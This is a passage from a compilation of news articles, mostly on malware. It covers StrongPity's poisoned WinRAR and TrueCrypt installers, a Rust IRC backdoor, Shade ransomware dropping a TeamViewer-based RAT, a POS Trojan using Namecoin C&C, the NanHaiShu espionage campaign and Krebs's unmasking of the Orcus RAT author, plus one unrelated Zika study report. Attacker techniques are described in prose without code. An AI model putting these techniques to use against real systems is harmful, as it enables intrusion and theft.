To gather victims, the attackers built special fake websites that supposedly host the two programs. In one instance discovered by the researchers, the criminals transposed two letters in a domain name in order to fool the potential victim into thinking it was the legitimate WinRAR installer website. In the image above, clicking on the blue button directs users to 'ralrab[.]com,' an obvious trick by the cybercriminals to fool victims. Following this link leads unsuspecting users to the malicious software.

Interestingly, in a case recorded in Italy back in May, users were no longer directed to a fraudulent site but were led to the StrongPity malware itself. StrongPity was also found redirecting visitors from popular software-sharing websites to a poisoned installer of the TrueCrypt software. The malicious WinRAR links have been removed, but redirects to poisoned TrueCrypt installers were still being found at the end of September.

According to Kurt Baumgartner, this method can be compared to the Crouching Yeti/Energetic Bear attacks, which compromised legitimate software distribution websites. He states: "These tactics are an unwelcome and dangerous trend that the security industry needs to address. The search for privacy and data integrity should not expose an individual to offensive waterhole damage. Waterhole attacks are inherently imprecise, and we hope to spur discussion around the need for easier and improved verification of encryption tool delivery."

At this point, wherever in the world we may be, we advise our readers to exercise caution when downloading software from untrusted websites. Malware such as StrongPity is simply waiting for its next victim, potentially compromising your security in the long run once infected.

Source: Kaspersky (1) (2)

Article source
18. Doctor Web’s specialists have discovered a new Linux Trojan written in the Rust programming language. The Trojan has been named Linux.BackDoor.Irc.16.

Linux.BackDoor.Irc.16 is a typical backdoor program that executes commands issued by cybercriminals via the IRC (Internet Relay Chat) protocol. The Trojan connects to the public chat channel specified in its configuration and awaits instructions. The Trojan can execute just four commands: connect to a specified chat channel; send cybercriminals information about an infected computer; send cybercriminals data about the applications running in the system; and delete itself from an infected machine.

Unlike the majority of its counterparts, Linux.BackDoor.Irc.16 is written in Rust, a programming language whose creation was sponsored by Mozilla Research. Its first stable version was released in 2015. Linux.BackDoor.Irc.16 was designed to be a cross-platform Trojan—to make a version for Windows, for example, cybercriminals can just recompile this malware program.

Doctor Web’s analysts believe that Linux.BackDoor.Irc.16 is, in fact, a prototype (proof of concept), because it cannot replicate itself, and the IRC channel used by the Trojan to receive commands from cybercriminals is not currently active.

The signature for Linux.BackDoor.Irc.16 is already in the Dr.Web for Linux database, and it is successfully detected and removed by Doctor Web Anti-virus products.

Article source
19. Scientists have found a potential treatment option for Zika that may protect babies from developing a severe birth defect, according to a new study from Yale University. By unraveling exactly how the virus causes microcephaly—a condition where babies are born with abnormally small heads and, usually, underdeveloped brains—researchers at Yale were able to test out a few existing antiviral treatments, and found some early signs of success with two, according to a paper published Wednesday in Cell Reports.

“There is an urgent need to identify therapeutic approaches to halt Zika infection, especially in pregnant women,” Marco Onorati, co-first author of the paper and a researcher at Yale, said in a press release. “In the interim, we hope these findings can lead to therapies that might minimize the damage caused by this virus.”

Earlier this year, scientists confirmed that Zika can cause microcephaly, but they still weren’t sure exactly how. Multiple studies have provided evidence that the Zika virus was damaging brain tissue, leading to microcephaly, but this latest research went a step further. By comparing neural stem cells in the lab with the brain tissue of a Zika-infected fetus that died from microcephaly, the team was able to find out how the Zika virus infects, damages, and kills the cells of a developing human brain.

(Image caption: MRI scans compare a normal brain (left) and a microcephalic brain.)

The researchers found that the virus disrupts pTBK1, a protein that helps spur cell division in the growing brain. This causes the cells—which are essential for setting up the structure of the brain—to die instead of multiply, and the virus also attacks these neural stem cells directly. Without these crucial cells, the brain isn’t able to fully develop, and microcephaly occurs.

Armed with this new understanding, the researchers decided to test out a few existing antiviral treatments. Some of these treatments were ineffective on the lab cells, others actually made the infection worse, but two managed to stop the replication of the Zika virus, protecting the neural stem cells from further damage. One of the treatments, Sofosbuvir, is already an FDA-approved drug used to treat Hepatitis C.

Though this is promising, a lot more work needs to be done before a Zika treatment is confirmed, the researchers cautioned. “To be succinct: Sofosbuvir is not, at present, a medication that people currently facing Zika should use,” Marco Onorati, first author on the paper and a neuroscientist at Yale, told me via email. “Animal studies found no effect of Sofosbuvir on fetal development, but there have been no adequate studies of Sofosbuvir in pregnant women. Our studies would also need to be repeated, in vitro and in vivo, before we could be sure Sofosbuvir has an effect in Zika virus treatment and is safe.”

Zika has been spreading rapidly throughout Latin America since the outbreak was first identified in Brazil last year. Currently, 56 nations are experiencing outbreaks, according to the CDC, and local transmission arrived in Miami earlier this summer. Though the vast majority of people infected with Zika have no symptoms, or only get a mild flu-like infection, Zika can cause microcephaly in some pregnant women, and that threat has caused the greatest concern. Children born with microcephaly can have physical and developmental disabilities or face early death or miscarriage.

Luckily, research like this helps us understand how Zika works, which means even if Sofosbuvir isn’t the right option, scientists now have a better chance at finding a treatment that does work. Combined with ongoing research on vector control and the rapid development of a vaccine, there’s hope that future children can be protected from Zika.

Article source
20. Crooks use RAT to assess the financial status of infected victims and decide on how much money to ask for

New Shade ransomware version delivers a RAT to Russian businesses

The crooks behind the most recent versions of Shade have added an interesting new tidbit to their malware, installing a modified version of TeamViewer on infected systems so they can spy on their targets and adjust the ransom note accordingly. This new Shade version only targets Russian companies that are running accounting software on their computers.

New Shade version delivers a RAT, but only to Russian businesses

Kaspersky researchers say that this new Shade version, prior to infecting the target, during its installation routine, actively scans the computer name for strings such as "BUH," "BUGAL," "БУХ," "БУГАЛ." These strings are likely to be found on computers used by the accounting departments at Russian-speaking companies. If Shade finds any of these strings, it stops the ransomware installation process and delivers another trojan called Teamspy, also known as TVSPY, TVRAT, or SpY-Agent.

The trojan contains a modified version of TeamViewer 6 that the malware authors have altered to hide its GUI. The trojan also includes the legitimate 7-Zip archiving tool and the NirCmd command-line utility. Furthermore, the crooks also install the TeamViewer VPN driver and the RDP Wrapper Library, used to open VPN connections and interact with the RDP protocol. All of these utilities delivered inside Teamspy allow the crooks to modify OS settings on infected systems, open an RDP connection, and use TeamViewer to connect to the infected system.

Crooks using Teamspy to determine the proper ransom sum

Kaspersky suggests that the crooks are using Teamspy's RAT (Remote Access Trojan) features to gather intelligence on the infected computer, to determine the appropriate ransom sum. "The option of remote access to an infected accounting system allows the malefactor to secretly keep an eye on the victim’s activities and collect detailed information on the victim’s solvency in order to use the most efficient way of getting cash," suggests Kaspersky's Fedor Sinitsyn.

Teamspy is quite a powerful RAT and allows a crook to record audio from infected systems, record the victim's desktop, run terminal commands, and download and install other executables.

Crooks are delivering the Shade ransomware at a later point

This last feature is most likely used to deliver the Shade ransomware at a later point in time, after the crooks have deemed the target important and decided on the ransom amount. Shade is one of today's most popular ransomware families, but Kaspersky researchers cracked its encryption and have provided a free decrypter via the No More Ransom initiative. Another name for the Shade ransomware is Troldesh.

This is not the first time malware has specifically targeted Russian businesses. During late June, Dr.Web discovered a trojan coded in 1C, a programming language used mostly in Russia. This trojan was delivering ransomware to companies using 1C:Enterprise, a popular accounting software in Russia.

(Image caption: Shade ransomware website)

Article source
21. Cybercriminals have always retained an interest in creating malware for POS (Point-of-Sale) terminals used to process card payments. IT security specialists are aware of many POS Trojans that facilitate the transfer of intercepted consumer data to criminals. A modification of one such Trojan was recently examined by Doctor Web’s security researchers.

The Trojan, named Trojan.Kasidet.1, is a modified version of Trojan.MWZLesson. For more information about this threat, read the article published by Doctor Web in September 2015. Trojan.MWZLesson can also intercept GET and POST requests sent via the Mozilla Firefox, Google Chrome, Internet Explorer, and Maxthon browsers.

Trojan.Kasidet.1 is distributed as a ZIP archive that contains a SCR file, which is a self-extracting SFX-RAR archive. This file then extracts and runs the main malicious payload. The Trojan first checks whether its copy and any virtual machines, emulators, and debuggers are present in the infected system. If Trojan.Kasidet.1 finds a program that can somehow hinder its operation, it terminates itself. If not, it gains administrator privileges and runs itself. Even though the User Account Control (UAC) system displays a warning on the screen, the potential victim is thrown off guard because the running application (wmic.exe) appears to have been developed by Microsoft.

The wmic.exe utility then runs the executable file of Trojan.Kasidet.1. Like Trojan.MWZLesson, it scans the computer’s memory for bank card track data obtained with the help of the POS terminal and transmits it to the Trojan’s command and control (C&C) server. In addition, it steals passwords for the Outlook, Foxmail, and Thunderbird email applications and can be incorporated into the Mozilla Firefox, Google Chrome, Microsoft Internet Explorer, and Maxthon browsers for the purpose of intercepting GET and POST requests. This malware program can also download and run another application or a malicious library on the infected computer, find a particular file on a disk, or generate a list of running processes and transmit it to the C&C server.

However, unlike Trojan.MWZLesson, the C&C server addresses of Trojan.Kasidet.1 are placed in a decentralized domain zone—.bit (Namecoin). This is a system of alternative root DNS servers based on Bitcoin technology. Common browsers cannot access such network resources; however, Trojan.Kasidet.1 uses its own algorithm to get the IPs of its C&C servers. Although malware programs that use this Namecoin technology have been known since 2013, they are not frequently detected in the wild, unlike other Trojans.

Dr.Web Anti-virus successfully detects and removes this Trojan, and, therefore, this malicious program poses no threat to Dr.Web users.

Article source
22. F-Secure researchers say parties involved in the South China Sea arbitration case were infected with the data-stealing NanHaiShu Trojan.

Cyber warfare appears to be the latest tool deployed in the territorial dispute over the South China Sea.

Hackers have used targeted malware to steal data from some of the governments and private sector organisations involved in the dispute over territory and sovereignty in the South China Sea. Cybersecurity company F-Secure Labs uncovered the malware, dubbed NanHaiShu by researchers, which it said targeted the Philippines Department of Justice, a major international law firm involved in the South China Sea case, and the organisers of November 2015's Philippines-based Asia-Pacific Economic Cooperation (APEC) Summit.

Erka Koivunen, cyber security advisor at F-Secure, said the NanHaiShu campaign is particularly sophisticated in nature. "This isn't an ordinary, run-of-the-mill opportunist piece of malware, but something that somebody has put some thought into and effort into, running a campaign with a selected group of organisations and individuals that are being targeted."

NanHaiShu is a remote access Trojan which is able to send any information from an infected machine to a remote command and control server with a Chinese IP address. All the machines targeted by the malware are within organisations that hold data on topics considered to be of strategic national interest to the Chinese government. F-Secure suspects that the malware was being used to gain better visibility of the legal proceedings around the South China Sea arbitration. "The finger points to the government of China, which would benefit from having a malware campaign against these targets," Koivunen claimed. China has consistently denied hacking other nations, and instead accuses others of launching espionage and hacking attacks against it.

Given that the data targeted for extraction by NanHaiShu is so sensitive and stored within organisations that, in theory, should be highly secure, how were hackers able to break into the networks, steal information, and remain undetected by victims? The answer is that the perpetrators were using very carefully prepared spear-phishing emails targeting people connected to the case, then using infected Excel spreadsheets to drop NanHaiShu into the system.

"The Excel sheets were named in a fashion that invites the recipient to open up the document and ignore the displayed macro security warnings. Once the macros have been disabled, the malware drops an embedded Jscript file on the victim's machine, causing the computer to be infected. After that, it can be remotely commanded by the attackers," said Koivunen.

The phishing emails were carefully crafted to ensure that precisely chosen targets would overrule warnings not to open the file. "The campaign is supported by previously-gathered intelligence on what these people are interested in and they're using timely topics, lingo specific to the profession, and were confident the recipients are in a position to disable macro warnings on Microsoft Office products, which isn't something which you can typically assume," says Koivunen. "You'd need to have knowledge that this is the case, otherwise it's an expensive campaign with no yield," he added, implying that the NanHaiShu campaign is one that's well resourced.

While the emails were designed in such a way as to ensure that the victims were mistakenly confident that the messages came from an authentic source, the victims still needed to override macro warnings from Microsoft Office in order to open the NanHaiShu-infected files. Therefore, if there's a lesson to be learned from this case, it's that macro security settings shouldn't be taken lightly -- they're likely protecting your system from a malicious intrusion. The latest version of Microsoft Office already offers new tactical features to protect against these sorts of attacks.

Full details on the malware are outlined in F-Secure's NanHaiShu: RATing the South China Sea report.

Article source
23. Security expert and leading investigative journalist Brian Krebs, in collaboration with security professional Daniel Gallagher, has recently discovered that a popular remote administration tool known as “Orcus RAT” is actually exhibiting the sort of behavior generally associated with a remote access trojan – a nasty piece of malware.

Canadian Man Behind Popular ‘Orcus RAT’

Far too many otherwise intelligent and talented software developers these days apparently think they can get away with writing, selling and supporting malicious software and then couching their commerce as a purely legitimate enterprise. Here’s the story of how I learned the real-life identity of a Canadian man who’s laboring under that same illusion as proprietor of one of the most popular and affordable tools for hacking into someone else’s computer.

Earlier this week I heard from Daniel Gallagher, a security professional who occasionally enjoys analyzing new malicious software samples found in the wild. Gallagher said he and members of @malwrhunterteam and @MalwareTechBlog recently got into a Twitter fight with the author of Orcus RAT, a tool they say was explicitly designed to help users remotely compromise and control computers that don’t belong to them.

(Image caption: A still frame from a YouTube video demonstrating Orcus RAT’s keylogging ability to steal passwords from Facebook and other sites.)

The author of Orcus — a person going by the nickname “Ciriis Mcgraw” a.k.a. “Armada” on Twitter and other social networks — claimed that his RAT was in fact a benign “remote administration tool” designed for use by network administrators and not a “remote access Trojan” as critics charged. Gallagher and others took issue with that claim, pointing out that they were increasingly encountering computers that had been infected with Orcus unbeknownst to the legitimate owners of those machines.

The malware researchers noted another reason that Mcgraw couldn’t so easily distance himself from how his clients used the software: he and his team provide ongoing technical support and help to customers who have purchased Orcus and are having trouble figuring out how to infect new machines or hide their activities online.

What’s more, the range of features and plugins supported by Armada, they argued, goes well beyond what a system administrator would look for in a legitimate remote administration client like TeamViewer, including the ability to launch a keylogger that records the victim’s every keystroke, as well as a feature that lets the user peek through a victim’s webcam and disable the light that alerts users when the camera is switched on.

A new feature of Orcus announced July 7 lets users configure the RAT so that it evades digital forensics tools used by malware researchers, including an anti-debugger and an option that prevents the RAT from running inside of a virtual machine.

Other plugins offered directly from Orcus’s tech support page (PDF) and authored by the RAT’s support team include a “survey bot” designed to “make all of your clients do surveys for cash;” a “USB/.zip/.doc spreader,” intended to help users “spread a file of your choice to all clients via USB/.zip/.doc macros;” a “Virustotal.com checker” made to “check a file of your choice to see if it had been scanned on VirusTotal;” and an “Adsense Injector,” which will “hijack ads on pages and replace them with your Adsense ads and disable adblocker on Chrome.”

WHO IS ARMADA?

Gallagher said he was so struck by the guy’s “smugness” and sheer chutzpah that he decided to look closer at any clues that Ciriis Mcgraw might have left behind as to his real-world identity and location.

Sure enough, he found that Ciriis Mcgraw also has a YouTube account under the same name, and that a video Mcgraw posted in July 2013 pointed to a 33-year-old security guard from Toronto, Canada.

Gallagher noticed that the video — a bystander recording on the scene of a police shooting of a Toronto man — included a link to the domain policereview[dot]info. A search of the registration records attached to that Web site name shows that the domain was registered to a John Revesz in Toronto and to the email address [email protected]

A reverse WHOIS lookup ordered from Domaintools.com shows the same [email protected] address was used to register at least 20 other domains, including “thereveszfamily.com,” “johnrevesz.com,” “revesztechnologies[dot]com,” and — perhaps most tellingly — “lordarmada.info”.

Johnrevesz[dot]com is no longer online, but this cached copy of the site from the indispensable archive.org includes his personal résumé, which states that John Revesz is a network security administrator whose most recent job in that capacity was as an IT systems administrator for TD Bank. Revesz’s LinkedIn profile indicates that for the past year at least he has served as a security guard for GardaWorld International Protective Services, a private security firm based in Montreal.

Revesz’s CV also says he’s the owner of the aforementioned Revesz Technologies, but it’s unclear whether that business actually exists; the company’s Web site currently redirects visitors to a series of sites promoting spammy and scammy surveys, come-ons and giveaways.

IT’S IN THE EULA, STUPID!

Contacted by KrebsOnSecurity, Revesz seemed surprised that I’d connected the dots, but beyond that did not try to disavow ownership of the Orcus RAT.

“Profit was never the intentional goal, however with the years of professional IT networking experience I have myself, knew that proper correct development and structure to the environment is no free venture either,” Revesz wrote in reply to questions about his software. “Utilizing my 15+ years of IT experience I have helped manage Orcus through its development.”

Revesz continued: “As for your legalities question. Orcus Remote Administrator in no ways violates Canadian laws for software development or sale. We neither endorse, allow or authorize any form of misuse of our software. Our EULA [end user license agreement] and TOS [terms of service] is very clear in this matter. Further we openly and candidly work with those prudent to malware removal to remove Orcus from unwanted use, and lock out offending users which may misuse our software, just as any other company would.”

Revesz said none of the aforementioned plugins were supported by Orcus, that they were all developed by third-party developers, and that “Orcus will never allow implementation of such features, and or plugins would be outright blocked on our part.”

In an apparent contradiction to that claim, plugins that allow Orcus users to disable the webcam light on a computer running the software, and one that enables the RAT to be used as a “stresser” to knock sites and individual users offline, are available directly from Orcus Technologies’ GitHub page.

Revesz also offers a service to help people cover their tracks online. Using his alter ego “Armada” on the hacker forum Hackforums[dot]net, Revesz also sells a “bulletproof dynamic DNS service” that promises not to keep records of customer activity. Dynamic DNS services allow users to have Web sites hosted on servers that frequently change their Internet addresses. This type of service is useful for people who want to host a Web site on a home-based Internet address that may change from time to time, because dynamic DNS services can be used to easily map the domain name to the user’s new Internet address whenever it happens to change.

Unfortunately, these dynamic DNS providers are extremely popular in the attacker community, because they allow bad guys to keep their malware and scam sites up even when researchers manage to track the attacking IP address and convince the ISP responsible for that address to disconnect the malefactor. In such cases, dynamic DNS allows the owner of the attacking domain to simply re-route the attack site to another Internet address that he controls.

Free dynamic DNS providers tend to report or block suspicious or outright malicious activity on their networks, and may well share evidence about the activity with law enforcement investigators. In contrast, Armada’s dynamic DNS service is managed solely by him, and he promises in his ad on Hackforums that the service — to which he sells subscriptions of various tiers for between $30-$150 per year — will not log customer usage or report anything to law enforcement.

According to writeups by Kaspersky Lab and Heimdal Security, Revesz’s dynamic DNS service has been seen used in connection with malicious botnet activity by another RAT known as Adwind. Indeed, Revesz’s service appears to involve the domain “nullroute[dot]pw”, which is one of 21 domains registered to a “Ciriis Mcgraw” (as well as orcus[dot]pw and orcusrat[dot]pw).

I asked Gallagher (the researcher who originally tipped me off about Revesz’s activities) whether he was persuaded at all by Revesz’s arguments that Orcus was just a tool and that Revesz wasn’t responsible for how it was used.

Gallagher said he and his malware researcher friends had private conversations with Revesz in which he seemed to acknowledge that some aspects of the RAT went too far, and promised to release software updates to remove certain objectionable functionalities. But Gallagher said those promises felt more like the actions of someone trying to cover himself.

“I constantly try to question my assumptions and make sure I’m playing devil’s advocate and not jumping the gun,” Gallagher said. “But I think he’s well aware that what he’s doing is hurting people, it’s just now he knows he’s under the microscope and trying to do and say enough to cover himself if it ever comes down to him being questioned by law enforcement.”

Article source